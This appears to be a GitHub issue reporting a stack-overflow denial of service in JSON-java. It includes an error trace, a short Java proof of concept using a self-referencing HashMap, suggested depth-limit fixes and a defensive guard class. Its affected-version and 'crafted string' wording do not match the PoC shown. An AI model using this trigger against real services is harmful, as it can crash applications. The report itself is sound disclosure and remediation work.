JSON-java
Stack overflow error caused by json-java serialization Map
Description
json-java before v20230227 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.
Error Log
```
Exception in thread "main" java.lang.StackOverflowError
    at org.json.JSONObject.<init>(JSONObject.java:284)
    at org.json.JSONObject.wrap(JSONObject.java:2480)
    at org.json.JSONObject.wrap(JSONObject.java:2452)
    at org.json.JSONObject.<init>(JSONObject.java:291)
    at org.json.JSONObject.wrap(JSONObject.java:2480)
    at org.json.JSONObject.wrap(JSONObject.java:2452)
    at org.json.JSONObject.<init>(JSONObject.java:291)
    at org.json.JSONObject.wrap(JSONObject.java:2480)
    at org.json.JSONObject.wrap(JSONObject.java:2452)
    at org.json.JSONObject.<init>(JSONObject.java:291)
    at org.json.JSONObject.wrap(JSONObject.java:2480)
    at org.json.JSONObject.wrap(JSONObject.java:2452)
    at org.json.JSONObject.<init>(JSONObject.java:291)
    at org.json.JSONObject.wrap(JSONObject.java:2480)
    at org.json.JSONObject.wrap(JSONObject.java:2452)
    at org.json.JSONObject.<init>(JSONObject.java:291)
    at org.json.JSONObject.wrap(JSONObject.java:2480)
    at org.json.JSONObject.wrap(JSONObject.java:2452)
    at org.json.JSONObject.<init>(JSONObject.java:291)
    at org.json.JSONObject.wrap(JSONObject.java:2480)
    at org.json.JSONObject.wrap(JSONObject.java:2452)
    at org.json.JSONObject.<init>(JSONObject.java:291)
```
PoC
```xml
<dependency>
    <groupId>org.json</groupId>
    <artifactId>json</artifactId>
    <version>20230227</version>
</dependency>
```

```java
import org.json.JSONObject;
import java.util.HashMap;

public class PoC2 {
    public static void main(String[] args) {
        HashMap<String, Object> map = new HashMap<>();
        // The map holds a reference to itself, so it is infinitely nested.
        map.put("t", map);
        // JSONObject(Map) -> wrap() -> JSONObject(Map) recurses until StackOverflowError.
        JSONObject jsonObject = new JSONObject(map);
        String jsonString = jsonObject.toString();
    }
}
```
Rectification Solution
- Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)
- Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing. (https://github.com/google/gson/commit/2d01d6a20f39881c692977564c1ea591d9f39027)
References
- https://github.com/jettison-json/jettison/issues/52
- https://github.com/jettison-json/jettison/pull/53/files
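
A caller-side guard in the spirit of the depth-limit fix suggested above, as an added example that is not part of the original issue or of JSON-java: it rejects a Map/Collection graph that contains a cycle or nests past an assumed threshold before it is handed to `new JSONObject(map)`. `MapGuard`, `check` and `MAX_DEPTH` are hypothetical names; only Map and Collection values are walked, not arrays or beans.

```java
import java.util.*;

// Added example (not JSON-java code): validate a structure before serializing it.
public class MapGuard {
    static final int MAX_DEPTH = 512; // assumed threshold, tune per application

    /** Throws IllegalArgumentException if root contains a cycle or nests deeper than MAX_DEPTH. */
    public static void check(Object root) {
        // Identity-based set: hashCode()/equals() on a self-containing map would itself recurse.
        Set<Object> onPath = Collections.newSetFromMap(new IdentityHashMap<>());
        walk(root, onPath, 0);
    }

    private static void walk(Object value, Set<Object> onPath, int depth) {
        Iterable<?> children;
        if (value instanceof Map) {
            children = ((Map<?, ?>) value).values();
        } else if (value instanceof Collection) {
            children = (Collection<?>) value;
        } else {
            return; // leaf value, nothing to descend into
        }
        if (depth >= MAX_DEPTH) {
            throw new IllegalArgumentException("nesting deeper than " + MAX_DEPTH);
        }
        if (!onPath.add(value)) { // container is already an ancestor of itself
            throw new IllegalArgumentException("cyclic reference at depth " + depth);
        }
        for (Object child : children) {
            walk(child, onPath, depth + 1);
        }
        onPath.remove(value); // shared, non-cyclic references remain legal
    }

    public static void main(String[] args) {
        Map<String, Object> cyclic = new HashMap<>();
        cyclic.put("t", cyclic); // constructed input, same shape as the PoC
        try {
            check(cyclic);
            System.out.println("cyclic: accepted");
        } catch (IllegalArgumentException e) {
            System.out.println("cyclic: rejected, " + e.getMessage());
        }
        Map<String, Object> shared = new HashMap<>();
        List<Object> leaf = new ArrayList<>(Arrays.asList(1, 2));
        shared.put("a", leaf);
        shared.put("b", leaf); // same list twice is a DAG, not a cycle
        check(shared);
        System.out.println("shared: accepted");
    }
}
```

The walk is recursive but bounded by `MAX_DEPTH`, so the guard itself cannot exhaust the stack on hostile input.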
#720 and #723 might provide an example of how to fix this for JSONObject.
Related to #701 ?
Closed due to issue fixed in another commit.